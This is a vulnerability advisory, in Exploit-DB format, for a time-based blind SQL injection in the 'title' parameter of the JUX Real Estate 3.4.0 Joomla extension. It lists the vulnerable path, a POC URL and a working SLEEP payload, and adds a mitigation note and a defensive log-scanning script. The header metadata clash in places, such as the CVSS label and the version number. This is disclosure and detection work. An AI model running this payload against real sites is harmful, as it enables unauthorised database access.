Vendor: JUX Real Estate
Author: CraCkEr
CVSS: 6.1 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89 - 74 - 707
Product Name: JUX Real Estate
Affected Version From: 3.4.2000
Affected Version To: 3.4.2000
Patch Exists: NO
Related CVE: CVE-2025-2126
CPE: a:joomlaux:jux_real_estate:3.4.0
Platforms Tested: Windows 11 Pro
Year: 2025

JUX Real Estate 3.4.0 – SQL Injection

SQL injection vulnerability in JUX Real Estate 3.4.0 allows attackers to access sensitive data, modify data, and potentially disrupt the application, resulting in financial losses and reputational damage to the organization.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to sanitize user-supplied data and the use of parameterized queries or prepared statements should be enforced.
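The mitigation above is the code-side fix; on the operations side the payload reported below is also observable in web server logs. As an added example that is not part of the original advisory, the following Python scans constructed Apache-style access-log lines (combined format with the response time in microseconds, `%D`, as the final field) for the `title` parameter, and reports whether a `SLEEP(n)` probe actually stalled the server for at least n seconds, which separates a blocked or ineffective probe from a confirmed time-based blind injection. The log format, IP address and log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed sample log lines (not real traffic). Final field is %D,
# the request service time in microseconds.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2025:10:15:01 +0000] "GET /extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=villa&beds=1 HTTP/1.1" 200 18421 412300
203.0.113.5 - - [26/Feb/2025:10:15:09 +0000] "GET /extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=1%27XOR%28SELECT%280%29FROM%28SELECT%28SLEEP%286%29%29%29a%29XOR%27Z HTTP/1.1" 200 18433 6318877
203.0.113.5 - - [26/Feb/2025:10:15:20 +0000] "GET /extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=1%27XOR%28SELECT%280%29FROM%28SELECT%28SLEEP%286%29%29%29a%29XOR%27Z HTTP/1.1" 403 512 1850
"""

# Request line, status, size and the trailing %D field.
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ (?P<usec>\d+)$'
)
# MySQL time-based blind primitive used in the advisory's payload.
SLEEP_RE = re.compile(r'\bSLEEP\s*\(\s*(\d+)\s*\)', re.IGNORECASE)


def analyse_line(line):
    """Return None for benign requests, else a dict describing the probe."""
    m = LOG_RE.search(line)
    if not m:
        return None
    qs = parse_qs(urlparse(m.group('target')).query)
    # parse_qs already percent-decodes once; a second pass catches
    # double-encoded payloads and is a no-op otherwise.
    title = unquote_plus(qs.get('title', [''])[0])
    s = SLEEP_RE.search(title)
    if not s:
        return None
    requested = int(s.group(1))
    elapsed = int(m.group('usec')) / 1_000_000
    return {
        'status': int(m.group('status')),
        'sleep_seconds': requested,
        'elapsed_seconds': round(elapsed, 3),
        # If the requested delay materialised, the SQL actually executed.
        'executed': elapsed >= requested,
    }


def scan(log_text):
    """Yield (line_number, finding) for every line carrying a SLEEP() probe."""
    results = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        finding = analyse_line(line)
        if finding is not None:
            results.append((number, finding))
    return results


if __name__ == '__main__':
    for number, finding in scan(SAMPLE_LOG):
        verdict = 'EXECUTED' if finding['executed'] else 'probe only'
        print(f"line {number}: HTTP {finding['status']}, "
              f"SLEEP({finding['sleep_seconds']}) took {finding['elapsed_seconds']}s -> {verdict}")
```

A request that completes far below the requested delay (the 403 line) indicates a blocked or non-executing probe; a request whose service time meets or exceeds it is evidence the injection ran.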

Exploit-DB raw data:

# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 26/02/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Tested on: Windows 11 Pro
# Impact: Database Access
# CWE: CWE-89 - CWE-74 - CWE-707
# CVE: CVE-2025-2126
# VDB: VDB-299039


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data, and crashing the application or making it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties

GET Parameter 'title' is vulnerable to SQLi


---
Parameter: title (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search


## POC:

https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]

## Payload:

1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z



[-] Done